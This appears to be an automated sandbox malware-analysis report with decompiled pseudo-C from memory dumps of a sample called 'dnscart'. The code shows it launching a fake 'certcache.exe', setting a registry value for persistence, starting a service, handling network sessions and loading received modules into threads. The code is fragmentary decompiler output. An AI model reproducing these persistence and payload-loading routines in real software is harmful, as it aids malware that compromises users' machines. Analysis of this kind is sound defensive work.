Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229990, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31
process

C-Code - Quality: 25%

			E00229990() {
				int _t10;
				void* _t12;

				memset();
				 *(_t12 - 0x88) = 0x44;
				 *((intOrPtr*)(_t12 - 0x5c)) = 0x80;
				_t10 = CreateProcessW("C:\Windows\SysWOW64\certcache.exe", 0, 0, 0, 0, 0, 0, 0, _t12 - 0x88, _t12 - 0x30);
				if(_t10 != 0) {
					CloseHandle( *(_t12 - 0x30));
					_t10 = CloseHandle( *(_t12 - 0x2c));
				}
				goto 0x231bae;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				return _t10;
			}

0x00229990
0x00229999
0x002299a6
0x002299c8
0x002299d0
0x002299d5
0x002299de
0x002299de
0x002299e4
0x002299e9
0x002299ea
0x002299eb
0x002299ec
0x002299ed
0x002299ee
0x002299ef

APIs

memset.NTDLL ref: 00229990
CreateProcessW.KERNEL32(C:\Windows\SysWOW64\certcache.exe,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 002299C8
CloseHandle.KERNEL32(?), ref: 002299D5
CloseHandle.KERNEL32(?), ref: 002299DE

Strings

D, xrefs: 00229999
C:\Windows\SysWOW64\certcache.exe, xrefs: 002299C3

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022866C, Relevance: 10.5, APIs: 7, Instructions: 22
network

C-Code - Quality: 59%

			E0022866C(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
				void* _t10;
				void _t28;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				intOrPtr* _t40;
				void* _t42;
				void* _t44;

				_t40 = __edi;
				_t32 = __ebx;
				if(L00221E80(_t10, __ecx, __edx) != 0) {
					goto 0x23168c;
					asm("int3");
					asm("int3");
					if(L00222560(__edx, _t40) != 0) {
						_t35 =  *(_t44 - 0x10);
						_t28 =  *_t35;
						 *_t32 = _t28;
						if(_t28 < 0x4000000) {
							_push(_t32);
							_t31 = L00228500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
							_t35 =  *(_t44 - 0x10);
							 *_t40 = _t31;
						}
						HeapFree(GetProcessHeap(), 0, _t35);
					}
					HeapFree(GetProcessHeap(), ??, ??);
				}
				InternetCloseHandle( *(_t44 - 0x30));
				InternetCloseHandle( *(_t44 - 0x34));
				InternetCloseHandle( *(_t44 - 0x38));
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t42);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t40 != 0x00000000;
			}

0x0022866c
0x0022866c
0x00228676
0x00228678
0x0022867d
0x0022867e
0x00228689
0x0022868b
0x0022868e
0x00228690
0x00228697
0x0022869f
0x002286a3
0x002286a8
0x002286ae
0x002286ae
0x002286ba
0x002286ba
0x002286cc
0x002286cc
0x002286d5
0x002286de
0x002286e7
0x002286f8
0x00228708
0x0022871a
0x0022872c
0x0022873f

APIs

InternetCloseHandle.WININET(?), ref: 002286D5
InternetCloseHandle.WININET(?), ref: 002286DE
InternetCloseHandle.WININET(?), ref: 002286E7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002286F1
HeapFree.KERNEL32(00000000), ref: 002286F8
GetProcessHeap.KERNEL32(00000000,?), ref: 00228701
HeapFree.KERNEL32(00000000), ref: 00228708

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022A037, Relevance: 9.2, APIs: 6, Instructions: 161

C-Code - Quality: 100%

			E0022A037(unsigned int __eax, void* __ebx, void* __ecx, void* __edx, signed char* __edi) {
				unsigned int _t31;
				unsigned int _t32;
				long _t41;
				signed char _t52;
				signed char _t54;
				signed char _t56;
				signed char _t58;
				signed char _t60;
				void* _t62;
				intOrPtr* _t63;
				int _t65;
				int _t66;
				int _t67;
				void* _t68;
				signed char _t69;
				signed char _t71;
				signed char _t73;
				signed char _t75;
				signed char _t77;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				int _t83;
				signed char* _t84;
				void* _t86;
				char* _t89;
				signed char* _t91;
				signed char* _t92;
				void* _t93;
				char* _t94;
				signed char* _t95;
				void* _t96;
				char* _t97;
				signed char* _t98;
				void* _t99;
				char* _t100;
				signed char* _t101;
				void* _t103;

				_t84 = __edi;
				_t79 = __edx;
				_t68 = __ecx;
				_t62 = __ebx;
				_t31 = __eax;
				if(__eax > 0x7f) {
					do {
						_t31 = _t31 >> 7;
						_t62 = _t62 + 1;
					} while (_t31 > 0x7f);
				}
				_t32 = _t84[0x28];
				 *((intOrPtr*)(_t103 - 4)) = 1;
				while(_t32 > 0x7f) {
					 *((intOrPtr*)(_t103 - 4)) =  *((intOrPtr*)(_t103 - 4)) + 1;
					_t32 = _t32 >> 7;
				}
				_t63 =  *((intOrPtr*)(_t103 - 0xc));
				_t41 = _t84[0x28] + _t84[0x20] + _t84[0x18] + _t84[8] +  *((intOrPtr*)(_t103 - 4)) + _t62 + _t79 + _t68 +  *((intOrPtr*)(_t103 - 8)) + 0xf;
				 *(_t63 + 4) = _t41;
				_t89 = RtlAllocateHeap(GetProcessHeap(), 0, _t41);
				 *_t63 = _t89;
				if(_t89 != 0) {
					 *_t89 = 8;
					_t91 = _t89 + 1;
					_t69 =  *_t84;
					while(_t69 > 0x7f) {
						_t60 = _t69;
						_t69 = _t69 >> 7;
						 *_t91 = _t60 | 0x00000080;
						_t91 =  &(_t91[1]);
					}
					 *_t91 = _t69 & 0x0000007f;
					_t91[1] = 0x12;
					_t92 =  &(_t91[2]);
					_t65 = _t84[8];
					_t71 = _t65;
					_t80 = _t84[4];
					if(_t65 > 0x7f) {
						do {
							_t58 = _t71;
							_t71 = _t71 >> 7;
							 *_t92 = _t58 | 0x00000080;
							_t92 =  &(_t92[1]);
						} while (_t71 > 0x7f);
					}
					 *_t92 = _t71 & 0x0000007f;
					_t93 =  &(_t92[1]);
					memcpy(_t93, _t80, _t65);
					_t94 = _t93 + _t65;
					 *_t94 = 0x1d;
					 *(_t94 + 1) = _t84[0xc];
					 *((char*)(_t94 + 5)) = 0x25;
					 *(_t94 + 6) = _t84[0x10];
					 *((char*)(_t94 + 0xa)) = 0x2a;
					_t95 = _t94 + 0xb;
					_t66 = _t84[0x18];
					_t73 = _t66;
					_t81 = _t84[0x14];
					if(_t66 > 0x7f) {
						do {
							_t56 = _t73;
							_t73 = _t73 >> 7;
							 *_t95 = _t56 | 0x00000080;
							_t95 =  &(_t95[1]);
						} while (_t73 > 0x7f);
					}
					 *_t95 = _t73 & 0x0000007f;
					_t96 =  &(_t95[1]);
					memcpy(_t96, _t81, _t66);
					_t97 = _t96 + _t66;
					 *_t97 = 0x32;
					_t98 = _t97 + 1;
					_t67 = _t84[0x20];
					_t75 = _t67;
					_t82 = _t84[0x1c];
					if(_t67 > 0x7f) {
						do {
							_t54 = _t75;
							_t75 = _t75 >> 7;
							 *_t98 = _t54 | 0x00000080;
							_t98 =  &(_t98[1]);
						} while (_t75 > 0x7f);
					}
					 *_t98 = _t75 & 0x0000007f;
					_t99 =  &(_t98[1]);
					memcpy(_t99, _t82, _t67);
					_t100 = _t99 + _t67;
					 *_t100 = 0x3a;
					_t101 = _t100 + 1;
					_t83 = _t84[0x28];
					_t77 = _t83;
					_t86 = _t84[0x24];
					if(_t83 > 0x7f) {
						do {
							_t52 = _t77;
							_t77 = _t77 >> 7;
							 *_t101 = _t52 | 0x00000080;
							_t101 =  &(_t101[1]);
						} while (_t77 > 0x7f);
					}
					 *_t101 = _t77 & 0x0000007f;
					memcpy( &(_t101[1]), _t86, _t83);
					_t63 =  *((intOrPtr*)(_t103 - 0xc));
				}
				return 0 |  *_t63 != 0x00000000;
			}

0x0022a037
0x0022a037
0x0022a037
0x0022a037
0x0022a037
0x0022a03a
0x0022a040
0x0022a040
0x0022a043
0x0022a044
0x0022a040
0x0022a049
0x0022a04c
0x0022a056
0x0022a060
0x0022a063
0x0022a066
0x0022a07f
0x0022a089
0x0022a08e
0x0022a09e
0x0022a0a0
0x0022a0a4
0x0022a0aa
0x0022a0ad
0x0022a0ae
0x0022a0b3
0x0022a0b5
0x0022a0b7
0x0022a0bc
0x0022a0be
0x0022a0bf
0x0022a0c7
0x0022a0c9
0x0022a0cd
0x0022a0d0
0x0022a0d3
0x0022a0d5
0x0022a0db
0x0022a0e0
0x0022a0e0
0x0022a0e2
0x0022a0e7
0x0022a0e9
0x0022a0ea
0x0022a0e0
0x0022a0f3
0x0022a0f5
0x0022a0f8
0x0022a0fe
0x0022a103
0x0022a109
0x0022a10c
0x0022a113
0x0022a116
0x0022a11a
0x0022a11d
0x0022a120
0x0022a122
0x0022a128
0x0022a130
0x0022a130
0x0022a132
0x0022a137
0x0022a139
0x0022a13a
0x0022a130
0x0022a143
0x0022a145
0x0022a148
0x0022a14e
0x0022a153
0x0022a156
0x0022a157
0x0022a15a
0x0022a15c
0x0022a162
0x0022a164
0x0022a164
0x0022a166
0x0022a16b
0x0022a16d
0x0022a16e
0x0022a164
0x0022a177
0x0022a179
0x0022a17c
0x0022a182
0x0022a187
0x0022a18a
0x0022a18b
0x0022a18e
0x0022a190
0x0022a196
0x0022a198
0x0022a198
0x0022a19a
0x0022a19f
0x0022a1a1
0x0022a1a2
0x0022a198
0x0022a1ab
0x0022a1b0
0x0022a1b6
0x0022a1b9
0x0022a1c9

APIs

GetProcessHeap.KERNEL32(00000000,00000001), ref: 0022A091
RtlAllocateHeap.NTDLL(00000000), ref: 0022A098
memcpy.NTDLL(00000000,00000001,?), ref: 0022A0F8
memcpy.NTDLL(-0000000A,?,?), ref: 0022A148
memcpy.NTDLL(-00000008,?,?), ref: 0022A17C
memcpy.NTDLL(-00000006,?,?), ref: 0022A1B0

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00228656, Relevance: 9.0, APIs: 6, Instructions: 20
network

C-Code - Quality: 44%

			E00228656(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
				void _t28;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				void* _t37;
				intOrPtr* _t40;
				void* _t42;
				void* _t44;

				_t40 = __edi;
				_t37 = __edx;
				_t32 = __ebx;
				if(L00221D40(__ecx) != 0) {
					goto 0x231674;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					if(L00221E80(_t10, __ecx, _t37) != 0) {
						goto 0x23168c;
						asm("int3");
						asm("int3");
						if(L00222560(_t37, _t40) != 0) {
							_t35 =  *(_t44 - 0x10);
							_t28 =  *_t35;
							 *_t32 = _t28;
							if(_t28 < 0x4000000) {
								_push(_t32);
								_t31 = L00228500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
								_t35 =  *(_t44 - 0x10);
								 *_t40 = _t31;
							}
							HeapFree(GetProcessHeap(), 0, _t35);
						}
						HeapFree(GetProcessHeap(), ??, ??);
					}
					InternetCloseHandle( *(_t44 - 0x30));
				}
				InternetCloseHandle( *(_t44 - 0x34));
				InternetCloseHandle( *(_t44 - 0x38));
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t42);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t40 != 0x00000000;
			}

0x00228656
0x00228656
0x00228656
0x00228660
0x00228662
0x00228667
0x00228668
0x00228669
0x0022866a
0x0022866b
0x00228676
0x00228678
0x0022867d
0x0022867e
0x00228689
0x0022868b
0x0022868e
0x00228690
0x00228697
0x0022869f
0x002286a3
0x002286a8
0x002286ae
0x002286ae
0x002286ba
0x002286ba
0x002286cc
0x002286cc
0x002286d5
0x002286d5
0x002286de
0x002286e7
0x002286f8
0x00228708
0x0022871a
0x0022872c
0x0022873f

APIs

InternetCloseHandle.WININET(?), ref: 002286DE
InternetCloseHandle.WININET(?), ref: 002286E7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002286F1
HeapFree.KERNEL32(00000000), ref: 002286F8
GetProcessHeap.KERNEL32(00000000,?), ref: 00228701
HeapFree.KERNEL32(00000000), ref: 00228708

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022992A, Relevance: 7.5, APIs: 5, Instructions: 17

C-Code - Quality: 27%

			E0022992A() {
				void* _t11;
				void* _t13;
				void* _t15;
				void* _t17;

				HeapFree(GetProcessHeap(), ??, ??);
				if( *((intOrPtr*)(_t17 - 8)) != 0) {
					 *0x22c088(_t15, 1, _t11);
					HeapFree(GetProcessHeap(), 0, _t11);
				}
				if(_t15 != 0) {
					StartServiceW(); // executed
					CloseServiceHandle(_t15);
				}
				CloseServiceHandle(_t13);
				return 1;
			}

0x00229931
0x0022993b
0x00229941
0x00229951
0x00229951
0x00229959
0x00229960
0x00229967
0x00229967
0x0022996e
0x0022997f

APIs

GetProcessHeap.KERNEL32 ref: 0022992A
HeapFree.KERNEL32(00000000), ref: 00229931
ChangeServiceConfig2W.ADVAPI32(?,00000001), ref: 00229941
GetProcessHeap.KERNEL32(00000000,?,?,00000001), ref: 0022994A
HeapFree.KERNEL32(00000000), ref: 00229951
CloseServiceHandle.ADVAPI32 ref: 0022996E

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229A53, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29
registry

C-Code - Quality: 56%

			E00229A53(signed int __ebx, void* __eflags) {
				int _t14;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t23;

				_t19 = __ebx;
				asm("scasb");
				asm("int3");
				L00221830(_t21, _t22);
				if(RegCreateKeyExW(0x80000001,  *(_t23 - 4), 0, 0, 0, 2, 0, _t23 - 0xc, 0) == 0) {
					RegSetValueExW( *(_t23 - 0xc), "certcache", 0, 1, _t23 - 0x214, 2 + _t19 * 2);
					RegCloseKey( *(_t23 - 0xc));
				}
				HeapFree(GetProcessHeap(), ??, ??);
				_t14 = HeapFree(GetProcessHeap(), ??, ??);
				goto 0x231c47;
				return _t14;
			}

0x00229a53
0x00229a53
0x00229a54
0x00229a55
0x00229a7d
0x00229a9a
0x00229aa3
0x00229aa3
0x00229ab5
0x00229ac7
0x00229ace
0x00229ad3

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00229A75
RegSetValueExW.ADVAPI32(00000000,certcache,00000000,00000001,?,00000000), ref: 00229A9A
RegCloseKey.ADVAPI32(?), ref: 00229AA3

Strings

certcache, xrefs: 00229A92

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00228A5E, Relevance: 6.1, APIs: 4, Instructions: 60

C-Code - Quality: 35%

			E00228A5E(void* __ecx, void* __edx, void* __edi, signed char __esi, void* __eflags) {
				void* _t19;
				intOrPtr _t20;
				signed char _t25;
				void* _t27;
				intOrPtr _t31;
				void* _t32;
				void _t34;
				signed char _t35;
				signed char _t38;
				signed int _t43;
				intOrPtr _t46;
				signed char _t47;
				void* _t48;

				L0:
				while(1) {
					L0:
					_t47 = __esi;
					_t45 = __edi;
					_t20 = L00221F70(_t19, __ecx, __edx);
					 *((intOrPtr*)(__edi + 8)) = _t20;
					if(_t20 == 0) {
						goto L17;
					}
					L11:
					_t31 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
					 *((intOrPtr*)(__edi + 0xc)) = _t31;
					if(_t31 == 0) {
						L15:
						goto 0x2317a5;
						asm("int3");
						asm("int3");
						_push( *((intOrPtr*)(_t45 + 8)));
						L16:
						asm("adc eax, 0x22c178");
						goto L17;
					} else {
						L12:
						goto 0x231789;
						asm("int3");
						asm("int3");
						asm("int3");
						L13:
						asm("scasb");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t32 = CreateThread(??, ??, ??, ??, ??, ??);
						 *(__edi + 0x10) = _t32;
						if(_t32 == 0) {
							goto L15;
						} else {
							L14:
							 *((intOrPtr*)(__edi + 4)) =  *((intOrPtr*)(_t48 - 0x18));
							_t34 =  *0x22c274; // 0x0
							 *__edi = _t34;
							 *0x22c274 = __edi;
							do {
								L1:
								_t46 =  *((intOrPtr*)(_t48 - 4));
								L2:
								_t43 = 0;
								_t38 = 0;
								 *(_t48 - 8) = 0;
								_t35 = 0x80;
								if(_t47 < _t46) {
									while(1) {
										L3:
										_t35 =  *_t47;
										_t47 = _t47 + 1;
										_t43 = _t43 | (_t35 & 0x7f) << _t38;
										if(_t35 >= 0) {
											break;
										}
										L4:
										_t38 = _t38 + 7;
										if(_t47 < _t46) {
											continue;
										}
										break;
									}
									L5:
									 *(_t48 - 8) = _t43;
								}
								L6:
								_t25 =  !((_t35 & 0x000000ff) >> 7);
								if((_t25 & 0x00000001) != 0) {
									L7:
									_t25 = _t43 + _t47;
									if(_t25 <= _t46) {
										L8:
										 *(_t48 - 0xc) = _t47;
										_t47 = _t25;
										_t25 = L00228800(_t48 - 0xc, _t48 - 0x18);
										if(_t25 != 0) {
											goto L9;
										}
									}
								}
								L18:
								goto 0x2317ba;
								asm("int3");
								return _t25;
								L9:
								_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
								_t45 = _t27;
							} while (_t27 == 0);
							goto 0x231775;
							asm("int3");
							continue;
						}
					}
					L19:
					L17:
					HeapFree(GetProcessHeap(), 0, _t45);
					goto L1;
				}
			}

0x00228a5e
0x00228a5e
0x00228a5e
0x00228a5e
0x00228a5e
0x00228a5e
0x00228a63
0x00228a68
0x00000000
0x00000000
0x00228a6a
0x00228a71
0x00228a73
0x00228a76
0x00228aab
0x00228aab
0x00228ab0
0x00228ab1
0x00228ab2
0x00228ab4
0x00228ab6
0x00000000
0x00228a78
0x00228a78
0x00228a78
0x00228a7d
0x00228a7e
0x00228a7f
0x00228a80
0x00228a80
0x00228a81
0x00228a82
0x00228a83
0x00228a84
0x00228a85
0x00228a86
0x00228a8c
0x00228a91
0x00000000
0x00228a93
0x00228a93
0x00228a96
0x00228a99
0x00228a9e
0x00228aa0
0x002289e3
0x002289e3
0x002289e3
0x002289e6
0x002289e6
0x002289e8
0x002289ea
0x002289ed
0x002289f1
0x002289f3
0x002289f3
0x002289f3
0x002289f5
0x002289fe
0x00228a02
0x00000000
0x00000000
0x00228a04
0x00228a04
0x00228a09
0x00000000
0x00000000
0x00000000
0x00228a09
0x00228a0b
0x00228a0b
0x00228a0b
0x00228a0e
0x00228a14
0x00228a18
0x00228a1e
0x00228a1e
0x00228a23
0x00228a29
0x00228a29
0x00228a32
0x00228a34
0x00228a3b
0x00000000
0x00000000
0x00228a3b
0x00228a23
0x00228ad0
0x00228ad0
0x00228ad5
0x00228ad6
0x00228a41
0x00228a4c
0x00228a52
0x00228a54
0x00228a58
0x00228a5d
0x00000000
0x00228a5d
0x00228a91
0x00000000
0x00228abb
0x00228ac5
0x00000000
0x00228ac5

APIs

GetProcessHeap.KERNEL32(00000008,00000014), ref: 00228A45
RtlAllocateHeap.NTDLL(00000000), ref: 00228A4C
GetProcessHeap.KERNEL32(00000000), ref: 00228ABE
HeapFree.KERNEL32(00000000), ref: 00228AC5

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00228AB4, Relevance: 6.1, APIs: 4, Instructions: 51

C-Code - Quality: 43%

			E00228AB4(void* __ebx, void* __edi, signed char __esi) {
				signed char _t21;
				intOrPtr _t27;
				intOrPtr _t30;
				void* _t31;
				void _t33;
				signed char _t36;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				void* _t45;
				signed char _t46;
				void* _t47;

				L0:
				while(1) {
					L0:
					_t46 = __esi;
					asm("adc eax, 0x22c178");
					while(1) {
						L17:
						HeapFree(GetProcessHeap(), 0, _t45);
						while(1) {
							L1:
							_t44 =  *((intOrPtr*)(_t47 - 4));
							L2:
							_t41 = 0;
							_t37 = 0;
							 *(_t47 - 8) = 0;
							_t36 = 0x80;
							if(_t46 < _t44) {
								while(1) {
									L3:
									_t36 =  *_t46;
									_t46 = _t46 + 1;
									_t41 = _t41 | (_t36 & 0x7f) << _t37;
									if(_t36 >= 0) {
										break;
									}
									L4:
									_t37 = _t37 + 7;
									if(_t46 < _t44) {
										continue;
									}
									break;
								}
								L5:
								 *(_t47 - 8) = _t41;
							}
							L6:
							_t21 =  !((_t36 & 0x000000ff) >> 7);
							if((_t21 & 0x00000001) != 0) {
								L7:
								_t21 = _t41 + _t46;
								if(_t21 <= _t44) {
									L8:
									 *(_t47 - 0xc) = _t46;
									_t42 = _t47 - 0x18;
									_t38 = _t47 - 0xc;
									_t46 = _t21;
									_t21 = L00228800(_t47 - 0xc, _t47 - 0x18);
									if(_t21 != 0) {
										L9:
										_t45 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
										if(_t45 == 0) {
											L1:
											_t44 =  *((intOrPtr*)(_t47 - 4));
											goto L2;
										} else {
											L10:
											goto 0x231775;
											asm("int3");
											L11:
											_t27 = L00221F70(_t23, _t38, _t42);
											 *((intOrPtr*)(_t45 + 8)) = _t27;
											if(_t27 == 0) {
												L17:
												HeapFree(GetProcessHeap(), 0, _t45);
												continue;
											} else {
												L12:
												_t30 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
												 *((intOrPtr*)(_t45 + 0xc)) = _t30;
												if(_t30 == 0) {
													L16:
													goto 0x2317a5;
													asm("int3");
													asm("int3");
													_push( *((intOrPtr*)(_t45 + 8)));
													goto L0;
												} else {
													L13:
													goto 0x231789;
													asm("int3");
													asm("int3");
													asm("int3");
													L14:
													asm("scasb");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_t31 = CreateThread(??, ??, ??, ??, ??, ??);
													 *(_t45 + 0x10) = _t31;
													if(_t31 == 0) {
														goto L16;
													} else {
														L15:
														 *((intOrPtr*)(_t45 + 4)) =  *((intOrPtr*)(_t47 - 0x18));
														_t33 =  *0x22c274; // 0x0
														 *_t45 = _t33;
														 *0x22c274 = _t45;
														do {
															goto L1;
														} while (_t45 == 0);
														goto L10;
													}
												}
											}
										}
										L19:
									}
								}
							}
							L18:
							goto 0x2317ba;
							asm("int3");
							return _t21;
						}
					}
				}
			}

0x00228ab4
0x00228ab4
0x00228ab4
0x00228ab4
0x00228ab6
0x00228abb
0x00228abb
0x00228ac5
0x002289e3
0x002289e3
0x002289e3
0x002289e6
0x002289e6
0x002289e8
0x002289ea
0x002289ed
0x002289f1
0x002289f3
0x002289f3
0x002289f3
0x002289f5
0x002289fe
0x00228a02
0x00000000
0x00000000
0x00228a04
0x00228a04
0x00228a09
0x00000000
0x00000000
0x00000000
0x00228a09
0x00228a0b
0x00228a0b
0x00228a0b
0x00228a0e
0x00228a14
0x00228a18
0x00228a1e
0x00228a1e
0x00228a23
0x00228a29
0x00228a29
0x00228a2c
0x00228a2f
0x00228a32
0x00228a34
0x00228a3b
0x00228a41
0x00228a52
0x00228a56
0x002289e3
0x002289e3
0x00000000
0x00228a58
0x00228a58
0x00228a58
0x00228a5d
0x00228a5e
0x00228a5e
0x00228a63
0x00228a68
0x00228abb
0x00228ac5
0x00000000
0x00228a6a
0x00228a6a
0x00228a71
0x00228a73
0x00228a76
0x00228aab
0x00228aab
0x00228ab0
0x00228ab1
0x00228ab2
0x00000000
0x00228a78
0x00228a78
0x00228a78
0x00228a7d
0x00228a7e
0x00228a7f
0x00228a80
0x00228a80
0x00228a81
0x00228a82
0x00228a83
0x00228a84
0x00228a85
0x00228a86
0x00228a8c
0x00228a91
0x00000000
0x00228a93
0x00228a93
0x00228a96
0x00228a99
0x00228a9e
0x00228aa0
0x002289e3
0x00000000
0x00000000
0x00000000
0x002289e3
0x00228a91
0x00228a76
0x00228a68
0x00000000
0x00228a56
0x00228a3b
0x00228a23
0x00228ad0
0x00228ad0
0x00228ad5
0x00228ad6
0x00228ad6
0x002289e3
0x00228abb

APIs

GetProcessHeap.KERNEL32(00000008,00000014), ref: 00228A45
RtlAllocateHeap.NTDLL(00000000), ref: 00228A4C
GetProcessHeap.KERNEL32(00000000), ref: 00228ABE
HeapFree.KERNEL32(00000000), ref: 00228AC5

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022850C, Relevance: 6.0, APIs: 4, Instructions: 32

C-Code - Quality: 76%

			E0022850C(intOrPtr __ecx, void* __edx, long* __edi) {
				void* _t4;
				void* _t9;
				void* _t17;
				void* _t19;

				_t9 = __edx;
				 *((intOrPtr*)(_t19 - 4)) = __ecx;
				_t4 = RtlAllocateHeap(GetProcessHeap(), 0,  *__edi);
				_t17 = _t4;
				if(_t17 == 0) {
					L4:
					goto 0x2315de;
					asm("int3");
					return _t4;
				} else {
					_push(_t9);
					_push( *((intOrPtr*)(_t19 - 4)));
					if(L00222DB0(_t17, __edi) == 0) {
						_t4 = _t17;
						goto L4;
					} else {
						HeapFree(GetProcessHeap(), 0, _t17);
						return 0;
					}
				}
			}

0x0022850c
0x0022850e
0x0022851c
0x00228522
0x00228526
0x00228557
0x00228557
0x0022855c
0x0022855d
0x00228528
0x00228528
0x00228529
0x0022853a
0x00228555
0x00000000
0x0022853c
0x00228546
0x00228554
0x00228554
0x0022853a

APIs

GetProcessHeap.KERNEL32(00000000), ref: 00228515
RtlAllocateHeap.NTDLL(00000000), ref: 0022851C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0022853F
HeapFree.KERNEL32(00000000), ref: 00228546

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022A7A0, Relevance: 6.0, APIs: 4, Instructions: 31

C-Code - Quality: 100%

			E0022A7A0(long __ecx) {
				int _t3;
				long _t7;
				void* _t9;
				void* _t10;

				_t10 =  *0x22cbd4; // 0x0
				_t7 = __ecx;
				_t9 = 0x22cbd4;
				while(_t10 != 0) {
					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
					if(_t3 == 0x102) {
						_t9 = _t10;
					} else {
						 *_t9 =  *_t10;
						CloseHandle( *(_t10 + 8));
						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
					}
					_t10 =  *_t9;
				}
				return _t3;
			}

0x0022a7a2
0x0022a7a8
0x0022a7ab
0x0022a7b2
0x0022a7b8
0x0022a7c3
0x0022a7e4
